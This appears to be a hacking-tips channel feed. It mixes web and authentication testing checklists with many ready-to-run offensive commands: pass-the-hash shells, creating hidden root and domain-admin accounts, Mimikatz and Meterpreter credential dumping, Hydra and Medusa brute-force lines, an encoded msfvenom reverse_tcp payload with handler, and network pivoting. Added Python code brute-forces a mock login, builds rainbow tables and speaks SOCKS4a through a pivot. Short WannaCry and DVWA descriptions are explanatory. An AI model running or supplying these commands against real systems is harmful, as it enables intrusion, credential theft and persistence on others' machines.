▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Check out the Authentication testing steps:
Test for user enumeration
Test for authentication bypass
Test for brute-force protection
Test password quality rules
Test remember-me functionality
Test for autocomplete on password forms/inputs
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi-factor authentication
Test for logout functionality presence
Test for cache management on HTTP (e.g. Pragma, Expires, Cache-Control: max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of-channel notification of account lockouts and successful password changes
Test for consistent authentication across applications with shared authentication schema / SSO
enjoy ❤️👍🏻
✅ git 2020
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 All steps for Data Validation testing:
Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter pollution
Test for auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie
enjoy ❤️👍🏻
✅ git 2020
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
300+ Powerful Termux Hacking Tools For Hackers (PDF, 374.4 KB)
#Requested
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Risky Functionality - Card Payment
#FastTips
Test for known vulnerabilities and configuration issues on the web server and web application
Test for default or guessable passwords
Test for non-production data in the live environment, and vice versa
Test for injection vulnerabilities
Test for buffer overflows
Test for insecure cryptographic storage
Test for insufficient transport layer protection
Test for improper error handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for authentication and authorization issues
Test for CSRF
enjoy ❤️👍🏻
✅ git 2020
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Remote Information Services
1️⃣ DNS
Zone transfer (AXFR): host -l securitymuppets.com 192.168.100.2
Metasploit auxiliaries:
auxiliary/gather/enum_dns
use auxiliary/gather/dns...
2️⃣ Finger - enumerate users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/finger_users
3️⃣ NTP
Metasploit auxiliaries (e.g. auxiliary/scanner/ntp/ntp_monlist)
4️⃣ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ip>
Metasploit module auxiliary/scanner/snmp/snmp_enum
snmpcheck -t <ip>
5️⃣ rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17
6️⃣ RPC services
rpcinfo -p <ip>
Endpoint mapper: auxiliary/scanner/dcerpc/endpoint_mapper
enjoy ❤️👍🏻
✅ git 2020
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
CVE-2019-7315: Genie Access WIP3BVAF IP Camera Directory Traversal (PDF, 767.6 KB)
> full tutorial
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Random helpful tips
> Post Exploitation
1️⃣ Command prompt access on a Windows host (pass-the-hash, no plaintext password needed)
pth-winexe -U Administrator%<hash> //<host ip> cmd.exe
2️⃣ Add Linux user (UID/GID 0, i.e. a second root account; -o allows the duplicate UID)
/usr/sbin/useradd -g 0 -u 0 -o user
echo user:password | /usr/sbin/chpasswd
3️⃣ Add Windows user
net user username password@1 /add
net localgroup administrators username /add
4️⃣ Solaris commands
useradd -o user
passwd user
usermod -R root user
5️⃣ Dump remote SAM:
PwDump.exe -u localadmin 192.168.0.1
6️⃣ Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full
7️⃣ Meterpreter
meterpreter > run winenum
meterpreter > run post/windows/gather/smart_hashdump
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token TVM\domainadmin
meterpreter > add_user hacker password1 -h 192.168.0.10
meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10
meterpreter > load mimikatz
meterpreter > wdigest
meterpreter > getWdigestPasswords
Migrate into a SYSTEM process (migrate <pid>) if these do not work!
8️⃣ Kitrap0d (MS10-015, 32-bit Windows only)
Download vdmallowed.exe and vdmexploit.dll to the victim
Run vdmallowed.exe to get a SYSTEM shell
9️⃣ Windows information
On Windows:
ipconfig /all
systeminfo
net localgroup administrators
net view
net view /domain
🔟 SSH tunnelling
Remote forward: expose 10.1.1.251:222 (reachable from the compromised host) as 127.0.0.1:4444 on the SSH server 192.168.10.118 (SSH listening on 443)
ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118
enjoy ❤️👍🏻
✅ git 2020
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Password attack tips:
1️⃣ Convert multiple web pages into a word list:
for x in 'index' 'about' 'post' 'contact' ; do curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; done
Or convert HTML to a word list (dictionary):
html2dic index.html.out | sort -u > index-html.dict
2️⃣ Brute-forcing HTTP password prompts (basic auth on a directory):
medusa -h <ip/host> -u <user> -P <password list> -M http -n <port> -m DIR:/<directory> -T 30
3️⃣ Medusa
# To display all currently installed modules
medusa -d
# To display the options of a specific module
medusa -M module_name -q
4️⃣ Test all passwords in the password file against the admin user on host 192.168.1.20 via the SMB | SSH | MS SQL | HTTP service (pick one module)
medusa -h 192.168.1.20 -u admin -P passwords.txt -M smbnt | ssh | mssql | http
5️⃣ To brute force 10 hosts and 5 users concurrently (using Medusa's parallel features)
# Each of the 5 threads targeting a host checks a specific user (-L); -F stops after the first valid login per host
medusa -H hosts.txt -U users.txt -P passwords.txt -T 10 -t 5 -L -F -M smbnt
6️⃣ Medusa allows username, password and host data to be placed in the same file (the "combo" file).
# Possible combinations in the combo file:
# host:username:password
# host:username:
# host::
# :username:password
# :username:
# ::password
# host::password
# :id:lm:ntlm::: (PwDump files)
# To test each username/password entry in the file combo.txt
medusa -M smbnt -C combo.txt
enjoy ❤️👍🏻
✅ git 2020
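Added example (not from the post above, nor from html2dic or dirb): a Python version of the HTML-to-wordlist step in tip 1, so the filtering is explicit instead of hidden in a pipe. It skips script/style bodies, keeps alt/title/placeholder/meta-content attributes (staff names and product names hide there), drops tokens shorter than 4 characters and adds lower-case and capitalised variants before the `sort -u` equivalent. The two sample pages are constructed.

```python
"""Build a site-specific wordlist from saved HTML pages.

Added example for this page: a Python stand-in for the
`curl | html2markdown | tr` and `html2dic | sort -u` pipelines above.
Not part of html2dic, dirb or any other tool; SAMPLE_PAGES is constructed input.
"""
import re
from html.parser import HTMLParser
from typing import Iterable, List, Set

# Constructed sample pages standing in for index.html / about.html fetched with curl.
SAMPLE_PAGES = {
    "index.html": """<html><head><title>Security Muppets - Welcome</title>
<meta name="description" content="Acme Widgets intranet portal"></head>
<body><h1>Welcome to SecurityMuppets</h1>
<p>Our Kermit2019 release ships in Summer.</p>
<img src="logo.png" alt="MuppetLabs">
<script>var secret = "function";</script>
</body></html>""",
    "about.html": """<html><body><p>Founded by Gonzo and Fozzie in Bristol.
Contact: admin@securitymuppets.com</p></body></html>""",
}


class _TextExtractor(HTMLParser):
    """Collect visible text plus alt/title/placeholder/content attribute values,
    skipping <script> and <style> bodies (their tokens are rarely passwords)."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: List[str] = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
        for name, value in attrs:
            if name in ("alt", "title", "placeholder", "content") and value:
                self.parts.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.parts.append(data)


def html_to_words(html: str, min_len: int = 4, max_len: int = 24) -> Set[str]:
    """Tokenise one page into candidate words with simple case variants."""
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    words: Set[str] = set()
    for token in re.findall(r"[A-Za-z0-9]+", " ".join(parser.parts)):
        if min_len <= len(token) <= max_len:
            words.update({token, token.lower(), token.capitalize()})
    return words


def build_wordlist(pages: Iterable[str]) -> List[str]:
    """Merge all pages and return the deduplicated, sorted list (the `sort -u` step)."""
    words: Set[str] = set()
    for html in pages:
        words |= html_to_words(html)
    return sorted(words)


def write_wordlist(path: str, words: Iterable[str]) -> None:
    """Write one word per line, ready for medusa -P / hydra -P."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    wordlist = build_wordlist(SAMPLE_PAGES.values())
    write_wordlist("webapp.txt", wordlist)
    print(f"{len(wordlist)} candidate words written to webapp.txt")
```

Feed it the pages you actually pulled with curl; the point of a site wordlist is the proper nouns a generic list like rockyou.txt will never contain.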
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Hydra brute-forcing tips
1️⃣ Hydra ships no default wordlist; rockyou.txt is the usual choice
# example brute-force attack on an FTP server
hydra -t 1 -l admin -P <path to password.lst> -vV <ip> ftp
--> -t # = run # parallel tasks
--> -l NAME = log in as NAME
--> -P FILE = try every password in FILE
--> -vV = verbose mode, showing login+password for each attempt
2️⃣ Check for "joe" accounts (password equal to the username) by adding -e s
3️⃣ Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp
4️⃣ Hydra FTP, known user and password list
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
5️⃣ Hydra SSH using a list of users and passwords (-u loops over users first)
hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh
6️⃣ Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 $ip ssh
7️⃣ Hydra SSH against a known username on port 22
hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt
8️⃣ Hydra POP3 brute force
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V
9️⃣ Hydra SMTP brute force
hydra -l <user> -P /usr/share/wordlists/nmap.lst $ip smtp -V
🔟 Hydra attack on an HTTP GET 401 (basic auth) login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
1️⃣1️⃣ Hydra attack on Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
1️⃣2️⃣ Hydra brute force of a WordPress admin login (S=Location: success when the response carries a Location header, i.e. the redirect to wp-admin)
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
enjoy ❤️👍🏻
✅ git 2020
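Added example, not Hydra's or Medusa's code: a small Python harness that does what tip 12 does, against a constructed in-process mock of wp-login.php, and doubles as a check for two items of the Authentication checklist earlier on this page (brute-force protection, default/joe accounts). Success is detected by a 302 with a Location header, which is exactly what `S=Location` means; the username is tried as the password first (`-e s`); and a 429 response is treated as a lockout, after which the account is left alone rather than hammered. Accounts, passwords and the lockout threshold are all constructed.

```python
"""Login brute-force harness against an in-process mock wp-login.php.

Added example for this page (not Hydra's or Medusa's code): success detected by a
redirect as with Hydra's S=Location, username tried as password first (-e s), and
a lockout detected and respected. Server, accounts and passwords are constructed.
"""
import collections
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Dict, List, Tuple

# Constructed candidate list standing in for passwords.txt / rockyou.txt.
PASSWORDS = ["letmein", "editor", "Summer2020", "password1", "welcome1", "qwerty"]


class _MockWordPressLogin(BaseHTTPRequestHandler):
    """Constructed target: 200 + error text on failure, 302 Location on success,
    429 once a username has failed LOCKOUT_AFTER times."""

    VALID = {"admin": "Summer2020", "editor": "editor"}    # constructed accounts
    LOCKOUT_AFTER = 5
    failures: collections.Counter = collections.Counter()  # shared across requests

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user, password = form.get("log", [""])[0], form.get("pwd", [""])[0]
        if self.failures[user] >= self.LOCKOUT_AFTER:
            self._reply(429, b"Too many failed attempts")
        elif self.VALID.get(user) == password:
            self.send_response(302)
            self.send_header("Location", "/wp-admin/")
            self.send_header("Content-Length", "0")
            self.end_headers()
        else:
            self.failures[user] += 1
            self._reply(200, b"<strong>ERROR</strong>: Invalid username or password.")

    def _reply(self, status: int, body: bytes):
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        return


def attempt(host: str, port: int, user: str, password: str,
            path: str = "/wp-login.php") -> Tuple[int, str]:
    """POST one credential pair; return (status, Location header or '')."""
    body = urllib.parse.urlencode(
        {"log": user, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("POST", path, body=body,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("Location") or ""
    finally:
        conn.close()


def brute_force(host: str, port: int, users: List[str], passwords: List[str],
                try_user_as_password: bool = True) -> Tuple[Dict[str, str], Dict[str, int]]:
    """Return ({user: password}, {user: attempts made before the lockout hit})."""
    found: Dict[str, str] = {}
    locked: Dict[str, int] = {}
    for user in users:
        candidates = ([user] if try_user_as_password else []) + [p for p in passwords if p != user]
        attempts = 0
        for password in candidates:
            status, location = attempt(host, port, user, password)
            if status == 302 and location:   # success condition, like Hydra's S=Location
                found[user] = password
                break
            if status == 429:                # brute-force protection exists: stop and record it
                locked[user] = attempts
                break
            attempts += 1
    return found, locked


def run_demo() -> Tuple[Dict[str, str], Dict[str, int]]:
    """Start the mock login on a free port, attack it, shut it down."""
    _MockWordPressLogin.failures.clear()
    server = ThreadingHTTPServer(("127.0.0.1", 0), _MockWordPressLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return brute_force("127.0.0.1", server.server_address[1],
                           ["admin", "editor", "guest"], PASSWORDS)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    found, locked = run_demo()
    print("valid credentials:", found)
    print("locked after N failures:", locked)
```

The `locked` result is the finding for the "brute-force protection" checklist item: if it stays empty after a long run, the application has none.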
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
Beating Windows Defender. Analysis of Metasploit's new evasion modules (PDF, 1.8 MB)
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Random recommended cracking tips:
1️⃣ Ophcrack
# Ophcrack is a free rainbow-table-based password cracking tool for Windows 8 (both local and Microsoft accounts), Windows 7, Windows Vista and Windows XP.
# The Ophcrack LiveCD option allows for completely automatic password recovery.
# It cracks LM and NTLM (Windows) hashes.
2️⃣ Pros
Software is freely available for download online
Passwords are recovered automatically using the LiveCD method
No software installation is necessary to recover passwords
No knowledge of any existing password is necessary
3️⃣ Cons
LiveCD ISO image must be written to a disc or USB device before use
Passwords longer than 14 characters cannot be cracked
Won't crack even the simplest Windows 10 password
4️⃣ RainbowCrack
# RainbowCrack cracks hashes by rainbow table lookup.
# To crack a single hash
rcrack [rainbow_table_path] -h hash_to_be_cracked
Path - location of the rainbow tables
Example: rcrack c:\rt -h fcea920f7412b5da7be0cf42b8c93759
# To crack multiple hashes in a file
rcrack [rainbow_table_path] -l hash_file
Example: rcrack c:\rt -l hash_list_file
# To look up rainbow tables in multiple directories
rcrack [rainbow_table_path] [rainbow_table_path2] -l hash_file
Example: rcrack c:\rt1 c:\rt2 -l hash_list_file
# To load and crack LM hashes from a pwdump file
rcrack [rainbow_table_path] -lm pwdump_file
# To load and crack NTLM hashes from a pwdump file
rcrack [rainbow_table_path] -ntlm pwdump_file
5️⃣ acccheck
# Windows password dictionary attack tool for SMB
# Usage: acccheck [options]
options -t [single host IP address]
-T [file containing target IP address(es)]
-p [single password]
-P [file containing passwords]
-u [single user]
-U [file containing usernames]
# Examples
Attempt the 'Administrator' account with a [BLANK] password.
acccheck -t 10.10.10.1
Attempt all passwords in 'password.txt' against the 'Administrator' account.
acccheck -t 10.10.10.1 -P password.txt
Attempt all passwords in 'password.txt' against all users in 'users.txt'.
acccheck -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
acccheck -t 10.10.10.1 -u administrator -p password
6️⃣ Brutespray
# BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa.
# usage: brutespray [-h] -f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS] [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME] [-p PASSWORD] [-c] [-i]
# Example
brutespray --file nas.gnmap -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/password.lst --threads 3 --hosts 1
Attack all services in nas.gnmap with a specific user list (unix_users.txt) and password list (password.lst).
7️⃣ Crowbar
# Crowbar is a brute-force tool which supports OpenVPN, Remote Desktop Protocol, SSH private keys and VNC keys.
# usage: crowbar -b [openvpn | rdp | sshkey | vnckey] [arguments]
Example: crowbar -b rdp -s 192.168.86.61/32 -u victim -C /root/words.txt -n 1
Brute force the RDP service on a single host with a specified username and wordlist, using 1 thread.
8️⃣ Aircrack-ng
# Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured.
# usage
aircrack-ng [options] <.cap / .ivs file(s)>
To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format.
✅ git 2020
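Added example, not RainbowCrack's or Ophcrack's code: a toy rainbow table in Python over a constructed keyspace (4 lowercase letters, MD5) that shows what `rcrack -h` does behind the scenes: a position-dependent reduction function, a table that stores only endpoint→start pairs, and a lookup that walks from every possible chain position to an endpoint and then regenerates the chain, verifying the hash so that false alarms (an endpoint match from a merged or colliding chain) are discarded. With a 4-character space it is instant; real tables make the same time/memory trade at gigabyte scale.

```python
"""Toy rainbow table: how rcrack/Ophcrack-style lookups work.

Added example for this page, not RainbowCrack's or Ophcrack's code. Keyspace,
chain length and start points are constructed and deliberately tiny.
"""
import hashlib
from typing import Dict, List, Optional

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 4
KEYSPACE = len(CHARSET) ** PW_LEN     # 456,976 candidate passwords
CHAIN_LEN = 50                        # hash/reduce links per chain


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def index_to_password(index: int) -> str:
    """Map an integer in [0, KEYSPACE) onto a password (base-26 digits)."""
    chars = []
    for _ in range(PW_LEN):
        index, digit = divmod(index, len(CHARSET))
        chars.append(CHARSET[digit])
    return "".join(chars)


def reduce_to_password(hash_hex: str, position: int) -> str:
    """Reduction function R_position: hash -> candidate password.
    Mixing in the position is what makes this a *rainbow* table: two chains
    that collide at different positions do not merge afterwards."""
    return index_to_password((int(hash_hex[:16], 16) + position) % KEYSPACE)


def step(password: str, position: int) -> str:
    """One chain link: p_{i+1} = R_i(H(p_i))."""
    return reduce_to_password(md5_hex(password), position)


def chain_passwords(start: str) -> List[str]:
    """All passwords p_0 .. p_{CHAIN_LEN-1} whose hashes one chain covers."""
    passwords = [start]
    for position in range(CHAIN_LEN - 1):
        passwords.append(step(passwords[-1], position))
    return passwords


def build_table(num_chains: int) -> Dict[str, str]:
    """Store only endpoint -> start; the middle of each chain is recomputed on demand."""
    table: Dict[str, str] = {}
    for k in range(num_chains):
        start = index_to_password((k * 7919) % KEYSPACE)   # deterministic start points
        p = start
        for position in range(CHAIN_LEN):
            p = step(p, position)
        table.setdefault(p, start)    # merged chains share an endpoint; keep the first
    return table


def crack(table: Dict[str, str], target_hash: str) -> Optional[str]:
    """Return the password for target_hash if any stored chain covers it."""
    for position in range(CHAIN_LEN - 1, -1, -1):
        # Assume the target is H(p_position); walk the rest of the chain to its endpoint.
        p = reduce_to_password(target_hash, position)
        for j in range(position + 1, CHAIN_LEN):
            p = step(p, j)
        start = table.get(p)
        if start is None:
            continue
        # Regenerate the chain and verify: an endpoint match can be a false alarm.
        candidate = start
        for j in range(CHAIN_LEN):
            if md5_hex(candidate) == target_hash:
                return candidate
            candidate = step(candidate, j)
    return None


if __name__ == "__main__":
    table = build_table(500)
    secret = chain_passwords(next(iter(table.values())))[17]
    print(f"{md5_hex(secret)} -> {crack(table, md5_hex(secret))}")
```

The table stores 500 passwords and covers up to 500 × 50 hashes; that 50:1 ratio, minus losses to merged chains, is the whole trade a real table makes, and the reason coverage is probabilistic rather than guaranteed.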
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 All related to Metasploit:
1️⃣ Metasploit basics
# To show all exploits for a vulnerability (or simply: search <term>)
grep <vulnerability> show exploits
# To select an exploit to use
use <exploit>
# To see the current settings for the selected exploit
show options
# To see compatible payloads for the selected exploit
show payloads
# To set the payload for the selected exploit
set payload <payload>
# To set an option for the selected exploit
set <option> <value>
# To run the exploit
exploit
# One-liner to generate a Windows payload
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars '\x00' --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/
# One-liner to start a Meterpreter handler
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"
2️⃣ Metasploit pivot
Compromise the 1st machine
# meterpreter > run arp_scanner -r 10.10.10.0/24
route add 10.10.10.0 255.255.255.0 <session>
use auxiliary/scanner/portscan/tcp
use a bind shell payload (hosts on the second network cannot connect back to you directly)
or run autoroute:
# meterpreter > ipconfig
# meterpreter > run autoroute -s 10.1.13.0/24
# meterpreter > getsystem
# meterpreter > run hashdump
# use auxiliary/scanner/portscan/tcp
# msf auxiliary(tcp) > use exploit/windows/smb/psexec
or port forwarding:
# meterpreter > run autoroute -s 10.1.13.0/24
# use auxiliary/scanner/portscan/tcp
# meterpreter > portfwd add -l <listening port> -p <remote port> -r <remote/internal host>
or socks proxy:
route add 10.10.10.0 255.255.255.0 <session>
use auxiliary/server/socks4a
Add the proxy to /etc/proxychains.conf (socks4 127.0.0.1 1080)
proxychains nmap -sT -T4 -Pn 10.10.10.50
setg Proxies socks4:127.0.0.1:1080
enjoy ❤️👍🏻
✅ git 2020
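Added example, not Metasploit's or proxychains' code: what proxychains actually sends to auxiliary/server/socks4a on 127.0.0.1:1080, in Python. It builds the SOCKS4 CONNECT (literal IP) or SOCKS4a CONNECT (hostname, resolved by the pivot) request, parses the 8-byte reply, and runs both against a constructed in-process proxy that grants only destinations inside its routes, the way the session's `route` table decides what the Metasploit proxy can reach. The constructed routes deliberately use the narrow `10.10.10.10 255.255.255.248` (a /29 covering only 10.10.10.8 to .15), so a request for 10.10.10.50 comes back rejected (0x5B): a mask that does not cover the target is the usual reason a proxychains nmap through a pivot returns nothing. ROUTES and PIVOT_DNS are constructed stand-ins for the session's route table and the internal DNS.

```python
"""SOCKS4a CONNECT through a pivot, as proxychains does with auxiliary/server/socks4a.

Added example for this page, not Metasploit's or proxychains' code. ROUTES and
PIVOT_DNS are constructed stand-ins for the session route table and internal DNS.
"""
import ipaddress
import socket
import socketserver
import threading
from typing import Dict

REQUEST_GRANTED, REQUEST_REJECTED = 0x5A, 0x5B

# Constructed pivot state: route add 10.10.10.10 255.255.255.248 covers only 10.10.10.8-15.
ROUTES = [ipaddress.ip_network("10.10.10.8/29")]
PIVOT_DNS = {"fileserver.corp.local": "10.10.10.12"}   # constructed internal name


def build_socks4a_connect(dest_host: str, dest_port: int, userid: str = "") -> bytes:
    """VN=4, CD=1 (CONNECT), DSTPORT, DSTIP, USERID, NUL [, hostname, NUL]."""
    try:
        dst_ip = ipaddress.IPv4Address(dest_host).packed    # plain SOCKS4 with a literal IP
        hostname = b""
    except ipaddress.AddressValueError:
        dst_ip = b"\x00\x00\x00\x01"                         # 0.0.0.x marker: SOCKS4a, proxy resolves
        hostname = dest_host.encode("idna") + b"\x00"
    return bytes([4, 1]) + dest_port.to_bytes(2, "big") + dst_ip + userid.encode() + b"\x00" + hostname


def parse_socks4_reply(data: bytes) -> Dict[str, object]:
    """VN=0, CD (0x5A granted / 0x5B-0x5D failures), DSTPORT, DSTIP."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("malformed SOCKS4 reply: %r" % data)
    return {"granted": data[1] == REQUEST_GRANTED, "code": data[1],
            "port": int.from_bytes(data[2:4], "big"),
            "addr": str(ipaddress.IPv4Address(data[4:8]))}


class _PivotSocks4a(socketserver.StreamRequestHandler):
    """Minimal server side: grant only if the destination falls inside ROUTES."""

    def _read_cstring(self) -> bytes:
        buf = bytearray()
        while True:
            b = self.rfile.read(1)
            if not b or b == b"\x00":
                return bytes(buf)
            buf += b

    def handle(self):
        head = self.rfile.read(8)
        vn, cd = head[0], head[1]
        port = int.from_bytes(head[2:4], "big")
        dst = ipaddress.IPv4Address(head[4:8])
        self._read_cstring()                                  # USERID, ignored here
        if 0 < int(dst) <= 0xFF:                              # SOCKS4a: hostname follows
            name = self._read_cstring().decode("idna")
            dst = ipaddress.IPv4Address(PIVOT_DNS.get(name, "0.0.0.0"))
        ok = vn == 4 and cd == 1 and any(dst in net for net in ROUTES)
        code = REQUEST_GRANTED if ok else REQUEST_REJECTED
        self.wfile.write(bytes([0, code]) + port.to_bytes(2, "big") + dst.packed)


def connect_via_socks4a(proxy: tuple, dest_host: str, dest_port: int) -> Dict[str, object]:
    """Send one CONNECT to the proxy and return the parsed reply."""
    with socket.create_connection(proxy, timeout=5) as s:
        s.sendall(build_socks4a_connect(dest_host, dest_port, "msf"))
        reply = b""
        while len(reply) < 8:
            chunk = s.recv(8 - len(reply))
            if not chunk:
                break
            reply += chunk
    return parse_socks4_reply(reply)


def run_demo() -> Dict[str, Dict[str, object]]:
    """Stand up the constructed pivot proxy and try three destinations through it."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _PivotSocks4a)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return {dest: connect_via_socks4a(server.server_address, dest, port)
                for dest, port in [("10.10.10.12", 445), ("10.10.10.50", 80),
                                   ("fileserver.corp.local", 445)]}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for dest, reply in run_demo().items():
        print(f"{dest:>22}: {'granted' if reply['granted'] else 'rejected'} (0x{reply['code']:02x})")
```

When a proxied scan shows every port closed, send one CONNECT like this by hand first: a 0x5B for every destination means the route, not the target, is the problem.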
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
Forwarded from Backup Legal Mega: 3.72 GB folder on MEGA (mega.nz), 122 files and 20 subfolders
Analysis of a Trojan downloader (PDF, 3.3 MB)
More related to Trojans
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 Description of Damn Vulnerable Web Application (DVWA)
Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to help security professionals test their skills and tools in a legal environment, help web developers better understand the process of securing web applications, and help both students and teachers learn about web application security in a controlled classroom environment.
DVWA's goal is to practise some of the most common web vulnerabilities, at varying levels of difficulty, through a simple, straightforward interface. Note that there are both documented and undocumented vulnerabilities in this software. This is done on purpose; you are encouraged to discover as many as you can.
WARNING!
> Damn Vulnerable Web Application is damn vulnerable! Do not upload it to the public html folder of your hosting provider or to any Internet-facing server, as it will be compromised. Use a virtual machine (such as VirtualBox or VMware) set to NAT network mode, and install the web server and database inside the guest.
🦑 Some of the vulnerabilities DVWA contains:
✅ Brute force: an HTTP login form used to test password brute-force tools and show the insecurity of weak passwords.
✅ Command execution (injection): execution of operating-system-level commands.
✅ Cross-Site Request Forgery (CSRF): lets an "attacker" change the application administrator's password.
✅ File inclusion: lets an "attacker" include remote/local files in the web application.
✅ SQL injection: lets an attacker inject SQL statements via an HTTP input field; DVWA includes blind and error-based SQL injection.
✅ Insecure file upload: lets an "attacker" upload malicious files to the web server.
✅ Cross-Site Scripting (XSS): an attacker can inject scripts into the web application/database. DVWA includes reflected and stored XSS.
✅ Easter eggs: full path disclosure, authentication bypass and others.
> Home page: http://dvwa.co.uk/
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
🦑 WannaCry | WannaDecrypt0r: NSA-cyberweapon-powered ransomware worm
1) Virus names: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
2) Vector: all Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses the EternalBlue (MS17-010) SMBv1 exploit to propagate.
3) Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
4) Backdooring: the worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. (source: Malwarebytes)
> Kill switch: if the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is reachable, the virus exits instead of infecting the host (source: Malwarebytes). This domain has been sinkholed, stopping the spread of the worm.
5) SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/
ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
Malwarebytes Labs: The worm that spreads WanaCrypt0r (technical analysis of the worm component)
▁ ▂ ▄ Uη∂єя¢σ∂є ▄ ▂ ▁
